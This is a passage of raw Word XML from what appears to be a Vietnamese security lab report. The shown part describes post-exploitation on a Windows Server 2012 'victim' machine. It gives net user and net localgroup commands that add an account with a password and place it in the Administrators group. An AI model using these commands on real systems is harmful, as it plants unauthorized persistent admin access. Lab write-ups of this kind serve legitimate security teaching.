            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="39" name="Picture 39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computer screen captur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9182" w14:textId="40EC992E" w:rsidR="00D964DF" w:rsidRPr="00A91CEB" w:rsidRDefault="00D964DF" w:rsidP="00D964DF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iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tiếp tục, ta sẽ thực hiện tạo một user có quyền Admin trên máy nạn nhân</w:t>
      </w:r>
      <w:r w:rsidR="00A320E0" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng lệnh </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0168E9D5" w14:textId="77777777" w:rsidR="00A320E0" w:rsidRPr="00A91CEB" w:rsidRDefault="00A320E0" w:rsidP="00A320E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A62713D" w14:textId="4D2C652D" w:rsidR="00A320E0" w:rsidRPr="00A91CEB" w:rsidRDefault="00A320E0" w:rsidP="00A320E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
      <w:r w:rsidR="00832D56" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /add</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D42790">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LeHaiDang</w:t>
      </w:r>
      <w:r w:rsidR="00F7259B" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00832D56" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Qwerty1.123</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBD5B1E" w14:textId="0EEAAE54" w:rsidR="00A320E0" w:rsidRPr="00A91CEB" w:rsidRDefault="00A320E0" w:rsidP="00A320E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">net localgroup administrators </w:t>
      </w:r>
      <w:r w:rsidR="00D42790">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LeHaiDang</w:t>
      </w:r>
      <w:r w:rsidR="00750991" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/add</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C57FDB5" w14:textId="718733D4" w:rsidR="00F7259B" w:rsidRPr="00A91CEB" w:rsidRDefault="00F7259B" w:rsidP="00A320E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi chạy lệnh trên thì ta đã tạo được user có tên là </w:t>
      </w:r>
      <w:r w:rsidR="00D42790">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LeHaiDang</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">và ta đã thêm vào </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A571DEF" w14:textId="17FA684B" w:rsidR="00F7259B" w:rsidRPr="00A91CEB" w:rsidRDefault="00F7259B" w:rsidP="00A320E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0ABB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EDC882A" wp14:editId="7C7FB160">
            <wp:extent cx="5943600" cy="1784350"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="60" name="Picture 6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6B3F" w14:textId="148D971E" w:rsidR="00A95932" w:rsidRPr="00A91CEB" w:rsidRDefault="00A95932" w:rsidP="00A320E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ta kiểm tra bên máy nạn nhân (Window Server 2012)</w:t>
      </w:r>
      <w:r w:rsidR="00523C9C" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, và thấy đã có user </w:t>
      </w:r>
      <w:r w:rsidR="00A72AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LeHaiDang</w:t>
      </w:r>
      <w:r w:rsidR="00523C9C" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00523C9C" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>được tạo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CB7BC7" w14:textId="4DC3126D" w:rsidR="0003016B" w:rsidRPr="00A91CEB" w:rsidRDefault="00ED3428" w:rsidP="007D463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F76D6DB" wp14:editId="4FEE2568">
            <wp:extent cx="5943600" cy="8030210"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="62" name="Picture 6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16B" w:rsidRPr="00A91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B6D18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="35D82BE6"/>
    <w:lvl w:ilvl="0" w:tplc="BDE0F01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664744"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5AD8A1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" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5CE46E3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="405C88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8E2705D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D9C4670"/>
    <w:lvl w:ilvl="0" w:tplc="BBCAEA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56"/>
    <w:rsid w:val="0003016B"/>
    <w:rsid w:val="000807D4"/>
    <w:rsid w:val="00161784"/>
    <w:rsid w:val="001D3927"/>
    <w:rsid w:val="00264E66"/>
    <w:rsid w:val="002C47AF"/>
    <w:rsid w:val="002D4804"/>
    <w:rsid w:val="003854FF"/>
    <w:rsid w:val="003C2E66"/>
    <w:rsid w:val="004026BC"/>
    <w:rsid w:val="00480EE7"/>
    <w:rsid w:val="004E3111"/>
    <w:rsid w:val="00523C9C"/>
    <w:rsid w:val="005534E2"/>
    <w:rsid w:val="005E338C"/>
    <w:rsid w:val="005F12CA"/>
    <w:rsid w:val="00643DA9"/>
    <w:rsid w:val="006F3006"/>
    <w:rsid w:val="007354D1"/>
    <w:rsid w:val="00741A8C"/>
    <w:rsid w:val="00750991"/>
    <w:rsid w:val="00763556"/>
    <w:rsid w:val="007724D6"/>
    <w:rsid w:val="007A0ABB"/>
    <w:rsid w:val="007C2A0C"/>
    <w:rsid w:val="007D463A"/>
    <w:rsid w:val="008164C5"/>
    <w:rsid w:val="00832D56"/>
    <w:rsid w:val="00842C42"/>
    <w:rsid w:val="00851594"/>
    <w:rsid w:val="008D71AA"/>
    <w:rsid w:val="00903322"/>
    <w:rsid w:val="00962C84"/>
    <w:rsid w:val="0098140B"/>
    <w:rsid w:val="009D4964"/>
    <w:rsid w:val="00A320E0"/>
    <w:rsid w:val="00A422E3"/>
    <w:rsid w:val="00A600CD"/>
    <w:rsid w:val="00A72AF3"/>
    <w:rsid w:val="00A91CEB"/>
    <w:rsid w:val="00A95932"/>
    <w:rsid w:val="00AE3DEF"/>
    <w:rsid w:val="00B1214B"/>
    <w:rsid w:val="00B604C0"/>
    <w:rsid w:val="00B65F3C"/>
    <w:rsid w:val="00B93CD5"/>
    <w:rsid w:val="00BA25F6"/>
    <w:rsid w:val="00BA6488"/>
    <w:rsid w:val="00C72FFD"/>
    <w:rsid w:val="00C920D9"/>
    <w:rsid w:val="00CC3F22"/>
    <w:rsid w:val="00D42790"/>
    <w:rsid w:val="00D75CFF"/>
    <w:rsid w:val="00D948AB"/>
    <w:rsid w:val="00D964DF"/>
    <w:rsid w:val="00DE375C"/>
    <w:rsid w:val="00DF7298"/>
    <w:rsid w:val="00E20201"/>
    <w:rsid w:val="00E84740"/>
    <w:rsid w:val="00ED3428"/>
    <w:rsid w:val="00EE4872"/>
    <w:rsid w:val="00F5038E"/>
    <w:rsid w:val="00F7259B"/>
    <w:rsid w:val="00F9620A"/>
    <w:rsid w:val="00FA7723"/>
    <w:rsid w:val="00FC2739"/>
    <w:rsid w:val="00FE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27A4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E879BCCE-313B-4D96-9519-AA9296E1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F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5F3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74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E49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8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18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Sơn</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lê Hải Đăng</cp:lastModifiedBy>
  <cp:revision>61</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-10T01:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-03T03:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>